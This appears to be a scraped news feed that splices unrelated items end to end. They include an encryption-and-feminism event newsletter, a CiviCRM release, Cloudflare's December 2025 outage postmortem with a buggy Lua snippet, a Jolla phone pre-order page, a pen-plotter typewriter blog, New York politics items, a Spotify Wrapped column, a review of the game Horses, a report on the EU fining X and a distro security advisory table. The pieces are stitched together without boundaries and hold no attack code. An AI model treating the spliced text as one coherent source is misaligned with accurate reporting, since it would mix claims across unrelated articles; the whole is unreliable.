Votre abonnement n’autorise pas la lecture de cet article
Pour plus d’informations, merci de contacter notre service commercial.
A follow-up to our Mozilla Festival session on Encryption and Feminism: Reimagining Child Safety Without Surveillance.
By Audrey Hingle
Our MozFest session on Encryption and Feminism: Reimagining Child Safety Without Surveillance was bigger than a one-hour festival slot could contain. The room filled fast, people were turned away at the door, and the Q&A could have gone on twice as long. Many attendees told us afterwards that this is the conversation they’ve been waiting to have. That feminist perspectives on encryption aren’t just welcome, they’re needed. So we’re opening the circle wider and taking it online so more people can join in.
In the room, we heard reflections that reminded us why this work matters. In feedback forms, attendees told us encryption isn’t only a security feature, it’s “part of upholding the rights of kids and survivors too, now let’s prove that to the rest of the world!” Another participant said they left ready to “be a champion of encryption to protect all.” Someone else named what many feel: “More feminist spaces are needed!”
It quickly became clear that this work is collective. It’s about shifting assumptions, building new narratives, and demanding technology that does not treat privacy as optional or as something only privacy hardliners or cryptography experts care about. Privacy is safety, dignity, and a precondition for seeking help. It is necessary to explore identity, form relationships, and grow up. Privacy is a human right.
We also heard calls for clarity and practicality: to reduce jargon, show people what encryption actually does, and push for privacy-preserving features more generally like screenshot protection and sender-controlled forwarding.
Participants also reminded us that encryption must account for disparity and intersectionality. Surveillance is not experienced equally. Some communities never get to “opt in” or consent at all. Feminist principles for encryption must reflect that reality.
And importantly, we heard gratitude for the tone of the session: open, candid, grounded, and not afraid to ask hard questions. “Normalize the ability to have tricky conversations in movement spaces,” someone wrote. We agree. These conversations shouldn’t only happen at conferences, they should live inside policy rooms, product roadmaps, activist communities, parenting forums, classrooms.
So let’s keep going.
🗓️ Feb 10, 4PM GMT, Online
Whether you joined us at MozFest, could't make it to Barcelona, or were one of the many who could not get into the room, this session is for you. We are running the event again online so more people can experience the conversation in full. We will revisit the discussion, share insights from the panel, and walk through emerging Feminist Encryption Principles, including the ideas and questions raised by participants.
Speakers will include Chayn’s Hera Hussain , Superbloom’s Georgia Bullen , Courage Everywhere’s Lucy Purdon , UNICEF’s Gerda Binder , and IX’s Mallory Knodel, Ramma Shahid Cheema and Audrey Hingle.
Help us grow this conversation. Share it with friends and colleagues who imagine a future where children are protected without surveillance and where privacy is not a privilege, but a right.
We hope you’ll join us!
Related : If you care about privacy-preserving messaging apps, Phoenix R&D is inviting feedback through a short survey asking for input on what features matter most for those in at-risk contexts.
New book from IX client Dr. Luca Belli looks at how recommender systems function, how they are measured, and why accountability remains difficult. Luca draws on his experience co-founding Twitter’s ML Ethics, Transparency and Accountability work, contributing to standards at NIST, and advising the European Commission on recommender transparency.
Now available via MEAP on Manning. Readers can access draft chapters as they are released, share feedback directly, and receive the final version when complete. Suitable for researchers, policy teams, engineers, and anyone involved in governance or evaluation of large-scale recommendation systems. It is also written for general readers, with no advanced technical knowledge required, so when you're done with it, hand it to a curious family member who wants to understand how algorithms decide what they see.
Support the Internet Exchange
If you find our emails useful, consider becoming a paid subscriber! You'll get access to our members-only Signal community where we share ideas, discuss upcoming topics, and exchange links. Paid subscribers can also leave comments on posts and enjoy a warm, fuzzy feeling.
Not ready for a long-term commitment? You can always leave us a tip .
United States
Global
What did we miss? Please send us a reply or write to editor@exchangepoint.tech .
Thanks to the hard work of CiviCRM’s incredible community of contributors, CiviCRM version 6.9.0 is now ready to download. This is a regular monthly release that includes new features and bug fixes. Details are available in the monthly release notes .
Your are encouraged to upgrade now for the most stable, secure CiviCRM experience:
Users of the CiviCRM Extended Security Releases (ESR) do not need to upgrade. The current version of ESR is CiviCRM 6.4.x.
CiviCRM is community driven and is sustained through code contributions and generous financial support.
We are committed to keeping CiviCRM free and open, forever . We depend on your support to help make that happen. Please consider supporting CiviCRM today .
Big thanks to all our partners , members , ESR subscribers and contributors who give regularly to support CiviCRM for everyone.
AGH Strategies - Alice Frumin; Agileware Pty Ltd - Iris, Justin Freeman; akwizgran; ALL IN APPLI - Guillaume Sorel; Artful Robot - Rich Lott; BrightMinded Ltd - Bradley Taylor; Christian Wach; Christina; Circle Interactive - Dave Jenkins, Rhiannon Davies; CiviCoop - Jaap Jansma, Erik Hommel; CiviCRM - Coleman Watts, Tim Otten, Benjamin W; civiservice.de - Gerhard Weber; CompuCo - Muhammad Shahrukh; Coop SymbioTIC - Mathieu Lutfy, Samuel Vanhove, Shane Bill; cs-bennwas; CSES (Chelmsford Science and Engineering Society) - Adam Wood; Dave D; DevApp - David Cativo; Duncan Stanley White; Freeform Solutions - Herb van den Dool; Fuzion - Jitendra Purohit, Luke Stewart; Giant Rabbit - Nathan Freestone; Greenpeace Central and Eastern Europe - Patrick Figel; INOEDE Consulting - Nadaillac; JacquesVanH; JMA Consulting - Seamus Lee; Joinery - Allen Shaw; Lemniscus - Noah Miller; Makoa - Usha F. Matisson; Megaphone Technology Consulting - Jon Goldberg; MJW Consulting - Matthew Wire; Mosier Consulting - Justin Mosier; Nicol Wistreich; OrtmannTeam GmbH - Andreas Lietz; Progressive Technology Project - Jamie McClelland; Progressive Technology Project - Jamie McClelland; Richard Baugh; Skvare - Sunil Pawar; Sarah Farrell-Graham; Squiffle Consulting - Aidan Saunders; Tadpole Collective - Kevin Cristiano; Wikimedia Foundation - Eileen McNaughton; Wildsight - Lars Sander-Green
Hi Peter, thanks for doing the AMA! I have a Delaware registered LLC (10 years old), I managed to get even an EIN remotely. However, I can't open a bank account remotely and so I have just been paying the registered agent fees and Delaware gov taxes for the LLC all these years. I however, genuinely want to come to the states to open the bank account and actually expand my business into the US. The LLC hasn't really had any meetings/etc. but taxes are paid. How do I use my LLC to apply for a B1/B2 to visit the US?
OR should I just close it and try the normal route? Thanks in advance!
The Framework Laptop 13 has a replaceable mainboard, which means that the processor can be easily upgraded after purchase. While Framework itself only offers Intel and AMD CPUs, a mainboard with a high-performance ARM processor from a third-party manufacturer has now launched.
The Qualcomm Snapdragon X Plus and Snapdragon X Elite have proven that ARM processors have earned a place in the laptop market, as devices like the Lenovo IdeaPad Slim 5 stand out with their long battery life and an affordable price point.
MetaComputing is now offering an alternative to Intel, AMD and the Snapdragon X series. Specifically, the company has introduced a mainboard that can be installe in the Framework Laptop 13 or in a mini PC case. This mainboard is equipped with a CIX CP8180 ARM chipset, which is also found inside the Minisforum MS-R1 . This processor has a total of eight ARM Cortex-A720 performance cores, the two fastest can hit boost clock speeds of up to 2.6 GHz. Moreover, there are four Cortex-A520 efficiency cores.
Additionally, there’s an ARM Immortalis-G720 GPU with ten cores and an AI accelerator with a performance of 30 TOPS. This chipset is likely slower than the Snapdragon X Elite or a current flagship smartphone chip, but it should still provide enough performance for many everyday tasks. Either way, this mainboard upgrade might only be interesting for developers for the most part, because early tests show that the SoC already draws about 16 watts at idle, which means battery life will likely be fairly short when combined with the 55Wh battery of the Framework Laptop 13.
The MetaComputing ARM AI PC Kit is available now at the manufacturer’s official online shop . The base model with 16GB RAM, 1TB SSD and a mini PC case costs $549. The mainboard can be installed in a previously purchased Framework Laptop 13. Users who don’t own a Framework Laptop can order a bundle including the notebook for $999. MetaComputing charges an additional $100 for 32GB RAM. Shipping is free worldwide, but these list prices do not include import fees or taxes.
Editor of the original article : Hannes Brecher - Senior Tech Writer - 19368 articles published on Notebookcheck since 2018
Since 2009 I have written for different publications with a focus on consumer electronics. I joined the Notebookcheck news team in 2018 and have combined my many years of experience with laptops and smartphones with my lifelong passion for technology to create informative content for our readers about new developments in this sphere. In addition, my design background as an art director at an ad agency has allowed me to have deeper insights into the peculiarities of this industry.
Translator: Enrico Frahn - Managing Editor Accessory Reviews, Tech Writer - 5837 articles published on Notebookcheck since 2021
My fascination for technology goes back a long way to the Pentium II era. Modding, overclocking and treasuring computer hardware has since become an integral part of my life. As a student, I further developed a keen interest in mobile technologies that can make the stressful college life so much easier. After I fell in love with the creation of digital content while working in a marketing position, I now scour the web to bring you the most exciting topics in the world of tech. Outside the office, I’m particularly passionate about motorsports and mountain biking.
Hannes Brecher, 2025-12- 4 (Update: 2025-12- 4)
2025-12-05
5 min read
On December 5, 2025, at 08:47 UTC (all times in this blog are UTC), a portion of Cloudflare’s network began experiencing significant failures. The incident was resolved at 09:12 (~25 minutes total impact), when all services were fully restored.
A subset of customers were impacted, accounting for approximately 28% of all HTTP traffic served by Cloudflare. Several factors needed to combine for an individual customer to be affected as described below.
The issue was not caused, directly or indirectly, by a cyber attack on Cloudflare’s systems or malicious activity of any kind. Instead, it was triggered by changes being made to our body parsing logic while attempting to detect and mitigate an industry-wide vulnerability disclosed this week in React Server Components.
Any outage of our systems is unacceptable, and we know we have let the Internet down again following the incident on November 18. We will be publishing details next week about the work we are doing to stop these types of incidents from occurring.
The graph below shows HTTP 500 errors served by our network during the incident timeframe (red line at the bottom), compared to unaffected total Cloudflare traffic (green line at the top).
Cloudflare's Web Application Firewall (WAF) provides customers with protection against malicious payloads, allowing them to be detected and blocked. To do this, Cloudflare’s proxy buffers HTTP request body content in memory for analysis. Before today, the buffer size was set to 128KB.
As part of our ongoing work to protect customers using React against a critical vulnerability, CVE-2025-55182 , we started rolling out an increase to our buffer size to 1MB, the default limit allowed by Next.js applications. We wanted to make sure as many customers as possible were protected.
This change was being rolled out using our gradual deployment system, and, as part of this rollout, we identified an increase in errors in one of our internal tools which we use to test and improve new WAF rules. As this was an internal tool, and the fix being rolled out was a security improvement, we decided to disable the tool for the time being as it was not required to serve or protect customer traffic.
Disabling this was done using our global configuration system. This system does not use gradual rollouts but rather propagates changes within seconds to the entire network and is under review following the outage we recently experienced on November 18 .
In our FL1 version of our proxy under certain circumstances, this latter change caused an error state that resulted in 500 HTTP error codes to be served from our network.
As soon as the change propagated to our network, code execution in our FL1 proxy reached a bug in our rules module which led to the following LUA exception:
[lua] Failed to run module rulesets callback late_routing: /usr/local/nginx-fl/lua/modules/init.lua:314: attempt to index field 'execute' (a nil value)
resulting in HTTP code 500 errors being issued.
The issue was identified shortly after the change was applied, and was reverted at 09:12, after which all traffic was served correctly.
Customers that have their web assets served by our older FL1 proxy
AND
had the Cloudflare Managed Ruleset deployed were impacted. All requests for websites in this state returned an HTTP 500 error, with the small exception of some test endpoints such as
/cdn-cgi/trace
.
Customers that did not have the configuration above applied were not impacted. Customer traffic served by our China network was also not impacted.
Cloudflare’s rulesets system consists of sets of rules which are evaluated for each request entering our system. A rule consists of a filter, which selects some traffic, and an action which applies an effect to that traffic. Typical actions are “
block
”, “
log
”, or “
skip
”. Another type of action is “
execute
”, which is used to trigger evaluation of another ruleset.
Our internal logging system uses this feature to evaluate new rules before we make them available to the public. A top level ruleset will execute another ruleset containing test rules. It was these test rules that we were attempting to disable.
We have a killswitch subsystem as part of the rulesets system which is intended to allow a rule which is misbehaving to be disabled quickly. This killswitch system receives information from our global configuration system mentioned in the prior sections. We have used this killswitch system on a number of occasions in the past to mitigate incidents and have a well-defined Standard Operating Procedure, which was followed in this incident.
However, we have never before applied a killswitch to a rule with an action of “
execute
”. When the killswitch was applied, the code correctly skipped the evaluation of the execute action, and didn’t evaluate the sub-ruleset pointed to by it. However, an error was then encountered while processing the overall results of evaluating the ruleset:
if rule_result.action == "execute" then
rule_result.execute.results = ruleset_results[tonumber(rule_result.execute.results_index)]
end
This code expects that, if the ruleset has action=”execute”, the “rule_result.execute” object will exist. However, because the rule had been skipped, the rule_result.execute object did not exist, and Lua returned an error due to attempting to look up a value in a nil value.
This is a straightforward error in the code, which had existed undetected for many years. This type of code error is prevented by languages with strong type systems. In our replacement for this code in our new FL2 proxy, which is written in Rust, the error did not occur.
We made an unrelated change that caused a similar, longer availability incident two weeks ago on November 18, 2025. In both cases, a deployment to help mitigate a security issue for our customers propagated to our entire network and led to errors for nearly all of our customer base.
We have spoken directly with hundreds of customers following that incident and shared our plans to make changes to prevent single updates from causing widespread impact like this. We believe these changes would have helped prevent the impact of today’s incident but, unfortunately, we have not finished deploying them yet.
We know it is disappointing that this work has not been completed yet. It remains our first priority across the organization. In particular, the projects outlined below should help contain the impact of these kinds of changes:
Enhanced Rollouts & Versioning : Similar to how we slowly deploy software with strict health validation, data used for rapid threat response and general configuration needs to have the same safety and blast mitigation features. This includes health validation and quick rollback capabilities among other things.
Streamlined break glass capabilities: Ensure that critical operations can still be achieved in the face of additional types of failures. This applies to internal services as well as all standard methods of interaction with the Cloudflare control plane used by all Cloudflare customers.
"Fail-Open" Error Handling: As part of the resilience effort, we are replacing the incorrectly applied hard-fail logic across all critical Cloudflare data-plane components. If a configuration file is corrupt or out-of-range (e.g., exceeding feature caps), the system will log the error and default to a known-good state or pass traffic without scoring, rather than dropping requests. Some services will likely give the customer the option to fail open or closed in certain scenarios. This will include drift-prevention capabilities to ensure this is enforced continuously.
Before the end of next week we will publish a detailed breakdown of all the resiliency projects underway, including the ones listed above. While that work is underway, we are locking down all changes to our network in order to ensure we have better mitigation and rollback systems before we begin again.
These kinds of incidents, and how closely they are clustered together, are not acceptable for a network like ours. On behalf of the team at Cloudflare we want to apologize for the impact and pain this has caused again to our customers and the Internet as a whole.
|
Time (UTC) |
Status |
Description |
|
08:47 |
INCIDENT start |
Configuration change deployed and propagated to the network |
|
08:48 |
Full impact |
Change fully propagated |
|
08:50 |
INCIDENT declared |
Automated alerts |
|
09:11 |
Change reverted |
Configuration change reverted and propagation start |
|
09:12 |
INCIDENT end |
Revert fully propagated, all traffic restored |
Cloudflare's connectivity cloud protects entire corporate networks , helps customers build Internet-scale applications efficiently , accelerates any website or Internet application , wards off DDoS attacks , keeps hackers at bay , and can help you on your journey to Zero Trust .
Visit 1.1.1.1 from any device to get started with our free app that makes your Internet faster and safer.
To learn more about our mission to help build a better Internet, start here . If you're looking for a new career direction, check out our open positions .
Related posts
November 18, 2025 12:00 AM
Cloudflare suffered a service outage on November 18, 2025. The outage was triggered by a bug in generation logic for a Bot Management feature file causing many Cloudflare services to be affected. ...
November 18, 2025 12:00 AM
Cloudflare suffered a service outage on November 18, 2025. The outage was triggered by a bug in generation logic for a Bot Management feature file causing many Cloudflare services to be affected. ...
October 28, 2025 12:00 PM
In Q3 2025, we observed Internet disruptions around the world resulting from government directed shutdowns, power outages, cable cuts, a cyberattack, an earthquake, a fire, and technical problems, as well as several with unexplained causes. ...
September 30, 2025 10:05 AM
On September 29, 2025, Internet connectivity was completely shut down across Afghanistan, impacting business, education, finance, and government services. ...
A successor to the iconic original Jolla Phone from 2013, brought to 2026 with modern specs and honoring the Jolla heritage design. And faster, smoother, more capable than the current Jolla C2.
A phone you can actually daily-drive. Still Private. Still Yours.
Over the past months, Sailfish OS community members voted on what the next Jolla device should be. The key characteristics, specifications and features of the device.
Based on community voting and real user needs, this device has only one mission:
Put control back in your hands.
Made as a thank-you to early supporters
Sailfish OS is proven to outlive mainstream support cycles. Long-term OS support, guaranteed for minimum 5 years. Incremental updates, and no forced obsolescence.
Mainstream phones send vast amounts of background data. A common Android phone sends megabytes of data per day to Google even if the device is not used at all.
Sailfish OS stays silent unless you explicitly allow connections.
DIT: DO IT TOGETHER
It’s a community mission.
Every pre-order makes production become a reality.
Technical specification subject to final confirmation upon final payment and manufacturing. Minor alterations may apply.
Because this is a community-funded device and we need committed pre-orders to turn the designs into a full product program and commit to order the first production batch. If we reach 2,000 units we start the full product program. If not, you get a full refund.
Yes. Fully.
The final price of the product is not set yet but we estimate it to settle between 599€ - 699€ (incl. your local VAT). The final price depends on the confirmation of the final specification and the Bill-of-Materials, which happens on due course during the product program. Notably in particular memory component prices have had exceptionally high volatility during this year.
By pre-ordering you confirm your special price of total 499€.
Yes.
It is real. Definition and real electro-mechanical design is underway, based on the community voting. To turn the designs into a full product program and commit to order the first batch, we need in minimum 2,000 committed pre-orders.
Once the manufacturing pathway is confirmed at 2,000 pre-orders.
Yes, there will be. We’ll make those available on due course the project.
Estimated by end of 1H/2026 .
Yes, we will design the cellular band configuration to enable global travelling as much as possible, including e.g. roaming in the U.S. carrier networks.
The initial sales markets are EU, UK, Switzerland and Norway. Entering other markets, such as the U.S. and Canada are to be decided due course based on potential interest from the areas.
We will design the cellular band configuration to enable potential future markets, including major U.S. carrier networks.
Did you know there were typewriters that used ball point pens to draw not just text but also graphics? I’ve collected several of these over the years. Read on to discover a world that you didn’t know existed.
Typewriter plotters could act as a normal typewriter in that you could type on the keys and have the text printed on the page. The difference is it would use a tiny ball point pen to “draw” the text, character by character, onto the page. It’s mesmerizing to watch! Many also included the ability to print graphs and bar charts, although in practice is was likely cumbersome. In addition, some models had the ability to connect to a computer to print text or even custom graphics.
Panasonic made three models. The top shelf was the RK-P400C Penwriter which included the RS-232 port built in for computer control. They also came with a white pen for error correcting.
Here’s a video of the Panasonic RK-P400C Penwriter typewritter plotter drawing a design under computer control via RS-232. The manual is available from Archive.org .
Mona Triangles on a Panasonic RK-P400C typewriter plotter.
A lower end model was the Panasonic RK-P440 Penwriter. It had a computer input but required the K100 external interface. Otherwise functionally the same: draws texts as well as business graphics with 4 color ballpoint pens. Portable using 6 C batteries.
The Panasonic K-100 interface box connected to the typewriter via a DE-9 port on the side and connected to your computer via either DB-25 RS-232 or Centronics parallel.
Here’s a video of the Panasonic RK-P400 Penwriter plotting the demo page using four ballpoint pens.
Panasonic also had the basic RK-P200C Penwriter which removed any computer control but kept the ability to do standalone business graphics. Pic from eBay.
There were other ballpoint pen based typewriters, such as this Silver Reed EB50 . It draws text and business graphics too but this one has a parallel port to act as a plotter. I added support for it to my workflow and it’s a very good.
Here’s a video of the Silver Reed Colour PenGraph EB50 plotting Schotter. I’ll admit it’s strange seeing this on something with a keyboard.
Smith Corona sold the Graphtext 90 . No computer control. Same pens and also ran on batteries.
Not to be left out, Brother offered the Type-a-Graph BP-30 . Pics from eBay— there’s usually a lot of these for sale.
Even Sears got into the game with the LXI Type-O-Graph (by likely rebranding the Brother Type-a-Graph, they look the same). Mine has a flaw in the print head mechanism.
Adding to the oddware that included pen plotters in them, there was even a calculator with a tiny plotter built-in. This is the Sharp EL-7050 calculator with a built in plotter printer. It could act as a usual printing calculator but it could also draw graphs and pie charts of data sets.
Here’s a video of the Sharp EL-7050 calculator printing the powers of 2.
And here’s the Sharp EL-7050 calculator plotting the graph.
Yamaha added a pen plotter to one of their music keyboards, the Yamaha MP-1. The idea was you’d compose music on the keyboard and it would plot the notes on paper as you played. The reality is the plotter was so much slower than you could play, it would take forever to catch up. It also wasn’t great at quantization so the notes were likely not what you’d expect.
Many small computers in the 1980s also had plotters available like the Commodore 1520 and the Atari 1020 . They used 4” wide paper and the same pens.
Some “slabtops” had built in pen plotters like the Casio PB-700 , Radio Shack Tandy PC-2 , and Sharp PC-2500 .
All of the typewriter models used the same ball point pens in four colors (black, red, green, blue) and were portable with a built-in handle and could run on batteries. They also likely all used the same plotter mechanisms made by Alps.
The pens are rather scarce now, mostly all that remains are NOS (new old stock) with some exceptions for a couple of German companies that make replacements for medical equipment that fit.
These pen typewriters were sold during the mid 1980s. In PC World magazine July 1985, the Panasonic RK-P400C retailed for $350.
Zohran Mamdani has an ambitious agenda. What does he need to do immediately during his first 100 days in office to make his promises a reality? And what can his administration do to make life better for New York City residents, right from the jump? Over the next two weeks, Hell Gate will be answering those questions.
First up, a look at his plans for universal free child care.
Zohran Mamdani has consistently said that universal, free child care will be his number one priority when he comes into office as mayor. It is the campaign pledge that has garnered the most vocal support from Governor Kathy Hochul. But it’s also the largest and most complicated undertaking he promised, and the one that comes with the biggest price tag –a cost that Mamdani will need state support to cover. If he wants to deliver on child care, he'll have to position himself to be ready to get to work as soon as he's in office—and to tackle multiple challenges at once.
The first step, multiple experts and advocates said, will have to be to fix what Eric Adams broke. "You can't build a new system on a broken foundation," said Emmy Liss, an independent early childhood consultant who worked on pre-K and 3K under Bill de Blasio.
“Age is just a number. So don’t take this personally.” Those words were the first inkling I had that I was about to receive some very bad news.
I woke up on Wednesday with a mild hangover after celebrating my 44th birthday. Unfortunately for me, this was the day Spotify released “Spotify Wrapped”, its analysis of (in my case) the 4,863 minutes I had spent listening to music on its platform over the past year. And this year, for the first time, they are calculating the “listening age” of all their users.
“Taste like yours can’t be defined,” Spotify’s report informed me, “but let’s try anyway … Your listening age is 86.” The numbers were emblazoned on the screen in big pink letters.
It took a long time for my 13-year-old daughter (listening age: 19) and my 46-year-old husband (listening age: 38) to stop laughing at me. Where did I go wrong, I wondered, feeling far older than 44.
But it seems I’m not alone. “Raise your hand if you felt personally victimised by your Spotify Wrapped listening age,” wrote one user on X. Another post , with a brutal clip of Judi Dench shouting “you’re not young” at Cate Blanchett, was liked more than 26,000 times. The 22-year-old actor Louis Partridge best mirrored my reaction when he shared his listening age of 100 on Instagram stories with the caption: “uhhh”.
“Rage bait” – defined as “online content deliberately designed to elicit anger or outrage” in order to increase web traffic – is the Oxford English Dictionary’s word of the year. And to me, that cheeky little message from Spotify, warning me not to take my personalised assessment of my personal listening habits personally, seemed a prime example.
“How could I have a listening age of 86?” I raged to my family and friends, when the artist I listened to the most this year was 26-year-old Sabrina Carpenter? Since I took my daughter to Carpenter’s concert at Hyde Park this summer, I have spent 722 minutes listening to her songs, making me “a top 3% global fan”.
The only explanation Spotify gave for my listening age of 86 was that I was “into music of the late 50s” this year. But my top 10 most-listened to songs were all released in the past five years and my top five artists included Olivia Dean and Chappell Roan (who released their debut albums in 2023).
Admittedly, Ella Fitzgerald is in there too. But her music is timeless, I raged; surely everyone listens to Ella Fitzgerald? “I don’t,” my daughter said, helpfully. “I don’t,” added my husband.
It’s also true that I occasionally listen to folk music from the 50s and 60s – legends such as Pete Seeger, Bob Dylan and Joan Baez. But when I analysed my top 50 “most listened to” songs, almost all of them (80%) were released in the last five years.
What’s particularly enraging is that Spotify knows my taste is best described as “eclectic” – because that’s how Spotify has described it to me. I have apparently listened to 409 artists in 210 music genres over the past year.
None of it makes sense, until you see the extent to which inciting rage in users like me is paying off for Spotify: in the first 24 hours, this year’s Wrapped campaign had 500 million shares on social media, a 41% increase on last year.
According to Spotify, listening ages are based on the idea of a “reminiscence bump”, which they describe as “the tendency to feel most connected to the music from your younger years”. To figure this out, they looked at the release dates of all the songs I played this year, identified the five-year span of music that I engaged with more than other listeners my age and “playfully” hypothesised that I am the same age as someone who engaged with that music in their formative years.
In other words, no matter how old you are, the more unusual and idiosyncratic and out of step your musical taste is compared with your peers, the more likely it is that Spotify will poke fun at some of the music you enjoy listening to.
But now that I understand this, rather than rising to the bait, I know exactly what to do. I walk over to my dusty, ancient CD player. I insert an old CD I bought when I was a teenager. I turn the volume up to max. And then I play one of my favourite songs, a classic song that everyone who has a listening age of 86 or over will know, like I do, off by heart: You Make Me Feel So Young by Ella Fitzgerald.
O n 25 November, award-winning Italian developer Santa Ragione, responsible for acclaimed titles such as MirrorMoon EP and Saturnalia, revealed that its latest project, Horses , had been banned from Steam - the largest digital store for PC games. A week later, another popular storefront, Epic Games Store, also pulled Horses, right before its 2 December launch date. The game was also briefly removed from the Humble Store, but was reinstated a day later.
The controversy has helped the game rocket to the top of the digital stores that are selling it, namely itch.io and GOG. But the question remains – why was it banned? Horses certainly delves into some intensely controversial topics (a content warning at the start details, “physical violence, psychological abuse, gory imagery, depiction of slavery, physical and psychological torture, domestic abuse, sexual assault, suicide, and misogyny”) and is upsetting and unnerving.
The plot is fairly simple, though it turns dark fast. You play as Anselmo, a 20-year-old Italian man sent to spend the summer working on a farm to build character. It’s revealed almost immediately (so fast in fact, that I let out a surprised “Ha!”) that the farm Anselmo has been sent to is not a normal one. The “horses” held there are not actually horses, but nude humans wearing horse heads that appear to be permanently affixed.
Your job is to tend to the garden, the “horses” and the “dog” (who is a human wearing a dog head). Anselmo performs menial, frustratingly slow everyday tasks across Horses’ three-ish hour runtime, like chopping wood and picking vegetables. These monotonous tasks are, however, interspersed with horrible and unsettling jobs. On day one, you find a “horse” body hanging from a tree and have to help the farmer bury it.
It’s disturbing, yes, but Horses doesn’t show most of these horrors playing out, and when it does, the simplistic, crude graphics dull its edges (when you encounter the farmer whipping a human “horse” and have to throw hydrogen peroxide on her back, the marks crisscrossing her skin are blurry and unreal).
The “horses’” genitals and breasts are blurred out. The enslaved are forbidden from fornicating, but you’ll find that they do that anyway (a simplistic, animalistic depiction of sex), and though you’re forced to “tame” them by putting them back in their pen, it’s just a button press to interact, with no indication of what you’ve actually done to them.
Valve, the company that owns Steam, told PC Gamer that Horses’ content was reviewed back in 2023. “After our team played through the build and reviewed the content, we gave the developer feedback about why we couldn’t ship the game on Steam, consistent with our onboarding rules and guidelines,” the statement read. “A short while later the developer asked us to reconsider the review, and our internal content review team discussed that extensively and communicated to the developer our final decision that we were not going to ship the game on Steam.”
According to IGN , Epic Games Store told developer Santa Ragione: “We are unable to distribute Horses on the Epic Games Store because our review found violations of the Epic Games Store Content Guidelines, specifically the ‘Inappropriate Content’ and ‘Hateful or Abusive Content’ policies.” Santa Ragione alleges that “no specifics on what content was at issue were provided.”
Horses’ gameplay is grotesque, not gratuitous. The horror is psychological and lies in the incongruity of performing menial tasks in a veritable hellscape, while having no idea why any of this is going on. There is barely any sound aside from the constant whirring of a film camera (the game is presented like a mostly silent Italian arthouse film), super-up-close shots of mouths moving as they talk or chew, unsettling character models, the occasional cut to a real-life shot of water pouring in a glass or slop filling up a dog bowl.
There is no explicit gore or violence. You are uncomfortable, frustrated and unnerved throughout, and the horrors of humanity are on full display, but nothing ever threatens to upend your lunch. It is an interesting meditation on violence and power dynamics, but it is by no means a shocking or radical game. The conversation that has ignited around it – about video games as art and the censorship of art – is proving to be more profound than the actual content of the game.
The European Commission has fined X €120 million ($140 million) for violating transparency obligations under the Digital Services Act (DSA).
This is the first non-compliance ruling under the DSA, a set of rules adopted in 2022 that requires platforms to remove harmful content and protect users across the European Union.
The fine was issued following a two-year investigation into the platform formerly known as Twitter to determine whether the social network violated the DSA regarding the effectiveness of measures to combat information manipulation and the dissemination of illegal content. The commission's preliminary findings were shared with X in July 2024.
Regulators found that X had breached transparency requirements through its misleading 'blue checkmark' system for 'verified accounts,' its opaque advertising database, and its blocking of researchers' access to public data.
The commission said that X's checkmark misleads users because accounts can purchase the badge without meaningful identity verification. This deceptive design also makes it challenging to assess account authenticity, increasing exposure to fraud and manipulation.
"This deception exposes users to scams, including impersonation frauds, as well as other forms of manipulation by malicious actors," the commission noted. "While the DSA does not mandate user verification, it clearly prohibits online platforms from falsely claiming that users have been verified, when no such verification took place."
X also failed to maintain a transparent advertising repository, as the platform's ad database lacks the accessibility features mandated by the DSA and imposes excessive processing delays that hinder efforts to detect scams, false advertising, and coordinated influence campaigns. It also set up unnecessary barriers that block researchers from accessing public platform data needed to study systemic risks facing European users.
"Deceiving users with blue checkmarks, obscuring information on ads and shutting out researchers have no place online in the EU. The DSA protects users. The DSA gives researchers the way to uncover potential threats," said Henna Virkkunen, the bloc's executive vice president for tech sovereignty.
"The DSA restores trust in the online environment. With the DSA's first non-compliance decision, we are holding X responsible for undermining users' rights and evading accountability."
The commission said that X now has 60 working days to address the blue checkmark violations and 90 days to submit action plans for fixing the research access and advertising issues, and added that failure to comply could trigger additional periodic penalties.
X was designated as a Very Large Online Platform (VLOP) under the EU's DSA on 25 April 2023, following its announcement that it had reached over 45 million monthly active users in the EU.
Broken IAM isn't just an IT problem - the impact ripples across your whole business.
This practical guide covers why traditional IAM practices fail to keep up with modern demands, examples of what "good" IAM looks like, and a simple checklist for building a scalable strategy.
The page you have tried to view ( Eventual Rust in CPython ) is currently available to LWN subscribers only.
Reader subscriptions are a necessary way to fund the continued existence of LWN and the quality of its content.
If you are already an LWN.net subscriber, please log in with the form below to read this content.
Please consider subscribing to LWN . An LWN subscription provides numerous benefits, including access to restricted content and the warm feeling of knowing that you are helping to keep LWN alive.
(Alternatively, this item will become freely available on December 18, 2025)
The Hell Gate Podcast is the best way to start your freezing weekend! A fresh episode will drop later today. Listen here , or wherever you get your podcasts
In congressional districts around the city , primary battles are shaping up, pitting moderates against the left. Then there's Representative Nydia Velázquez's Brooklyn and Queens district, where the fight will be…left vs. further left.
The district lies at the heart of the " Commie Corridor ," encompassing neighborhoods including Williamsburg, Greenpoint, Ridgewood, and Bushwick. Velázquez announced last month that she would step down, taking the city's political class by surprise because in Congress, bowing out at the age of 72 is considered early retirement.
Brooklyn Borough President Antonio Reynoso kicked off his campaign for the seat on Thursday, the first candidate to formally enter the race. The Democratic Socialists of America are expected to put up their own candidate and make a strong play for the district, which is one of their best shots to pick up a congressional seat next year.
"The fight must continue. And I'm ready to step up," Reynoso said in a launch video , filmed mostly in Spanish on the south side of Williamsburg where he grew up.
Reynoso is firmly in the progressive wing of the Democratic Party, but not a DSA member.
| Dist. | ID | Release | Package | Date |
|---|---|---|---|---|
| AlmaLinux | ALSA-2025:22012 | 10 | buildah | 2025-12-05 |
| AlmaLinux | ALSA-2025:22363 | 8 | firefox | 2025-12-05 |
| AlmaLinux | ALSA-2025:22417 | 8 | gimp:2.8 | 2025-12-05 |
| AlmaLinux | ALSA-2025:22668 | 8 | go-toolset:rhel8 | 2025-12-05 |
| AlmaLinux | ALSA-2025:20994 | 10 | ipa | 2025-12-05 |
| AlmaLinux | ALSA-2025:21038 | 10 | kea | 2025-12-05 |
| AlmaLinux | ALSA-2025:21931 | 10 | kernel | 2025-12-05 |
| AlmaLinux | ALSA-2025:22388 | 8 | kernel | 2025-12-05 |
| AlmaLinux | ALSA-2025:22387 | 8 | kernel-rt | 2025-12-05 |
| AlmaLinux | ALSA-2025:21036 | 10 | pcs | 2025-12-05 |
| AlmaLinux | ALSA-2025:22361 | 10 | qt6-qtquick3d | 2025-12-05 |
| AlmaLinux | ALSA-2025:22394 | 10 | qt6-qtsvg | 2025-12-05 |
| AlmaLinux | ALSA-2025:22660 | 9 | systemd | 2025-12-04 |
| AlmaLinux | ALSA-2025:21936 | 10 | valkey | 2025-12-05 |
| Debian | DSA-6072-1 | stable | chromium | 2025-12-04 |
